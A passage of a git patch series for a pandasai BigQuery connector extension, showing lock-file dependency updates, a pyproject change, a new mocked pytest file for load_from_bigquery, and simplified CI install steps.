{file = "SQLAlchemy-2.0.36-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:c54a1e53a0c308a8e8a7dffb59097bff7facda27c70c286f005327f21b2bd6b1"},
{file = "SQLAlchemy-2.0.36-cp38-cp38-win32.whl", hash = "sha256:1e0d612a17581b6616ff03c8e3d5eff7452f34655c901f75d62bd86449d9750e"},
{file = "SQLAlchemy-2.0.36-cp38-cp38-win_amd64.whl", hash = "sha256:8958b10490125124463095bbdadda5aa22ec799f91958e410438ad6c97a7b793"},
+ {file = "SQLAlchemy-2.0.36-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:dc022184d3e5cacc9579e41805a681187650e170eb2fd70e28b86192a479dcaa"},
+ {file = "SQLAlchemy-2.0.36-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b817d41d692bf286abc181f8af476c4fbef3fd05e798777492618378448ee689"},
+ {file = "SQLAlchemy-2.0.36-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a4e46a888b54be23d03a89be510f24a7652fe6ff660787b96cd0e57a4ebcb46d"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4ae3005ed83f5967f961fd091f2f8c5329161f69ce8480aa8168b2d7fe37f06"},
+ {file = "SQLAlchemy-2.0.36-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:03e08af7a5f9386a43919eda9de33ffda16b44eb11f3b313e6822243770e9763"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:3dbb986bad3ed5ceaf090200eba750b5245150bd97d3e67343a3cfed06feecf7"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-win32.whl", hash = "sha256:9fe53b404f24789b5ea9003fc25b9a3988feddebd7e7b369c8fac27ad6f52f28"},
{file = "SQLAlchemy-2.0.36-cp39-cp39-win_amd64.whl", hash = "sha256:af148a33ff0349f53512a049c6406923e4e02bf2f26c5fb285f143faf4f0e46a"},
@@ -959,31 +978,6 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"]
-[[package]]
-name = "sqlalchemy-bigquery"
-version = "1.12.0"
-description = "SQLAlchemy dialect for BigQuery"
-optional = false
-python-versions = "<3.13,>=3.8"
-files = [
- {file = "sqlalchemy_bigquery-1.12.0-py2.py3-none-any.whl", hash = "sha256:5b2b77bdaefe9c0663db213d9475a5abbae88fa46108c352d19fa6fc51a47a1a"},
- {file = "sqlalchemy_bigquery-1.12.0.tar.gz", hash = "sha256:12783ad83ffad34e8e6e14046cb14bb2f1a3e7fb52676f5a24e940ff5cdeb864"},
-]
-
-[package.dependencies]
-google-api-core = ">=1.31.5,<2.0.dev0 || >2.3.0,<3.0.0dev"
-google-auth = ">=1.25.0,<3.0.0dev"
-google-cloud-bigquery = ">=3.3.6,<4.0.0dev"
-packaging = "*"
-sqlalchemy = ">=1.4.16,<3.0.0dev"
-
-[package.extras]
-alembic = ["alembic"]
-all = ["GeoAlchemy2", "alembic", "google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "packaging", "pyarrow (>=3.0.0)", "pytz", "shapely"]
-bqstorage = ["google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "pyarrow (>=3.0.0)"]
-geography = ["GeoAlchemy2", "shapely"]
-tests = ["packaging", "pytz"]
-
[[package]]
name = "tomli"
version = "2.1.0"
@@ -1026,4 +1020,4 @@ zstd = ["zstandard (>=0.18.0)"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<3.12"
-content-hash = "6f45d047b8ea8bbe3581415b8eb32c846d8a4dbb0eb2cf8b10aa1b8202abb44c"
+content-hash = "b8eb06ba9664f21506f299ef72a72ff505ad7feb5d36540b8c61b87c2a84504f"
diff --git a/extensions/ee/connectors/bigquery/pyproject.toml b/extensions/ee/connectors/bigquery/pyproject.toml
index d58f62381..47159d818 100644
--- a/extensions/ee/connectors/bigquery/pyproject.toml
+++ b/extensions/ee/connectors/bigquery/pyproject.toml
@@ -9,7 +9,7 @@ readme = "README.md"
python = ">=3.9,<3.12"
pandasai = "^3.0.0"
pandasai-sql = "^0.1.0"
-sqlalchemy-bigquery = "^1.8.0"
+google-cloud-bigquery = "^3.27.0"
[tool.poetry.group.test]
optional = true
diff --git a/extensions/ee/connectors/bigquery/tests/test_bigquery.py b/extensions/ee/connectors/bigquery/tests/test_bigquery.py
new file mode 100644
index 000000000..de89908ce
--- /dev/null
+++ b/extensions/ee/connectors/bigquery/tests/test_bigquery.py
@@ -0,0 +1,68 @@
+import pytest
+from unittest.mock import patch, MagicMock
+import pandas as pd
+from pandasai_bigquery import load_from_bigquery
+
+
+@pytest.fixture
+def mock_connection_info():
+ return {
+ "project_id": "test-project",
+ "credentials": None,
+ }
+
+
+@pytest.fixture
+def mock_query_result():
+ # Mock query result with sample data
+ return [
+ {"column1": "value1", "column2": 123},
+ {"column1": "value2", "column2": 456},
+ ]
+
+
+def test_load_from_bigquery_success(mock_connection_info, mock_query_result):
+ query = "SELECT * FROM test_table"
+
+ # Mock the BigQuery client and query job
+ with patch("google.cloud.bigquery.Client") as MockBigQueryClient:
+ mock_client = MagicMock()
+ MockBigQueryClient.return_value = mock_client
+
+ mock_query_job = MagicMock()
+ mock_client.query.return_value = mock_query_job
+
+ mock_query_job.result.return_value = [
+ MagicMock(**row) for row in mock_query_result
+ ]
+
+ # Mock converting query results to DataFrame
+ mock_dataframe = pd.DataFrame(mock_query_result)
+ with patch("pandas.DataFrame", return_value=mock_dataframe):
+ result = load_from_bigquery(mock_connection_info, query)
+
+ # Assertions
+ mock_client.query.assert_called_once_with(query)
+ assert isinstance(result, type(mock_dataframe))
+ assert result.equals(mock_dataframe)
+
+
+def test_load_from_bigquery_failure(mock_connection_info):
+ query = "SELECT * FROM non_existent_table"
+
+ # Mock the BigQuery client and query job
+ with patch("google.cloud.bigquery.Client") as MockBigQueryClient:
+ mock_client = MagicMock()
+ MockBigQueryClient.return_value = mock_client
+
+ mock_query_job = MagicMock()
+ mock_client.query.return_value = mock_query_job
+
+ # Simulate an exception during query execution
+ mock_query_job.result.side_effect = Exception("Query failed")
+
+ with pytest.raises(Exception, match="Query failed"):
+ load_from_bigquery(mock_connection_info, query)
+
+ # Assertions
+ mock_client.query.assert_called_once_with(query)
From 4d8425296d1a6d0c4c29b940b8b7646dbf07acb0 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 20:46:03 +0100
Subject: [PATCH 56/58] fix env issue of pandas not found
---
extensions/ee/connectors/bigquery/pyproject.toml | 1 +
1 file changed, 1 insertion(+)
diff --git a/extensions/ee/connectors/bigquery/pyproject.toml b/extensions/ee/connectors/bigquery/pyproject.toml
index 47159d818..a8e1b4219 100644
--- a/extensions/ee/connectors/bigquery/pyproject.toml
+++ b/extensions/ee/connectors/bigquery/pyproject.toml
@@ -9,6 +9,7 @@ readme = "README.md"
python = ">=3.9,<3.12"
pandasai = "^3.0.0"
pandasai-sql = "^0.1.0"
+sqlalchemy-bigquery = "^1.8.0"
google-cloud-bigquery = "^3.27.0"
[tool.poetry.group.test]
From ea9a37d686025feab2bc7a195286aac905540c64 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 20:56:12 +0100
Subject: [PATCH 57/58] fix: ci use pyproject
---
.github/workflows/ci.yml | 31 ++++++-------------------------
1 file changed, 6 insertions(+), 25 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index d438353d8..afd2e4767 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -54,10 +54,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
)
echo "Running tests for $dir"
(
@@ -75,10 +72,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
)
echo "Running tests for $dir"
(
@@ -96,10 +90,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
)
echo "Running tests for $dir"
(
@@ -118,10 +109,7 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
poetry run pytest tests/
Pop-Location
}
@@ -133,10 +121,7 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
+ poetry install --all-extras --with test --verbose
poetry run pytest tests/
Pop-Location
}
@@ -148,11 +133,7 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
- poetry install --all-extras
- poetry add pytest@7.4.0
- poetry add pytest-mock@3.11.1
- poetry add pytest-cov@4.1.0
- poetry run pytest tests/
+ poetry install --all-extras --with test --verbose
Pop-Location
}
}
From 7c4119b3e908ec9a707ee428b53f3f6a7a8271a2 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 21:01:29 +0100
Subject: [PATCH 58/58] fix: lock file
---
extensions/ee/connectors/bigquery/poetry.lock | 29 +++++++++++++++++--
1 file changed, 27 insertions(+), 2 deletions(-)
diff --git a/extensions/ee/connectors/bigquery/poetry.lock b/extensions/ee/connectors/bigquery/poetry.lock
index dab545136..f56ffab8f 100644
--- a/extensions/ee/connectors/bigquery/poetry.lock
+++ b/extensions/ee/connectors/bigquery/poetry.lock
@@ -681,7 +681,7 @@ files = []
develop = true
[package.dependencies]
-numpy = "1.23.2"
+numpy = ">=1.23.2,<2.0.0"
pandasai = ">=3.0.0a0"
sqlalchemy = "^2.0.0"
@@ -978,6 +978,31 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"]
+[[package]]
+name = "sqlalchemy-bigquery"
+version = "1.12.0"
+description = "SQLAlchemy dialect for BigQuery"
+optional = false
+python-versions = "<3.13,>=3.8"
+files = [
+ {file = "sqlalchemy_bigquery-1.12.0-py2.py3-none-any.whl", hash = "sha256:5b2b77bdaefe9c0663db213d9475a5abbae88fa46108c352d19fa6fc51a47a1a"},
+ {file = "sqlalchemy_bigquery-1.12.0.tar.gz", hash = "sha256:12783ad83ffad34e8e6e14046cb14bb2f1a3e7fb52676f5a24e940ff5cdeb864"},
+]
+
+[package.dependencies]
+google-api-core = ">=1.31.5,<2.0.dev0 || >2.3.0,<3.0.0dev"
+google-auth = ">=1.25.0,<3.0.0dev"
+google-cloud-bigquery = ">=3.3.6,<4.0.0dev"
+packaging = "*"
+sqlalchemy = ">=1.4.16,<3.0.0dev"
+
+[package.extras]
+alembic = ["alembic"]
+all = ["GeoAlchemy2", "alembic", "google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "packaging", "pyarrow (>=3.0.0)", "pytz", "shapely"]
+bqstorage = ["google-cloud-bigquery-storage (>=2.0.0,<3.0.0dev)", "grpcio (>=1.47.0,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "pyarrow (>=3.0.0)"]
+geography = ["GeoAlchemy2", "shapely"]
+tests = ["packaging", "pytz"]
+
[[package]]
name = "tomli"
version = "2.1.0"
@@ -1020,4 +1045,4 @@ zstd = ["zstandard (>=0.18.0)"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<3.12"
-content-hash = "b8eb06ba9664f21506f299ef72a72ff505ad7feb5d36540b8c61b87c2a84504f"
+content-hash = "e7972cfc66fcbd6ec484ec17347ac40a2a0279847298b8a5303a02f78badbde1"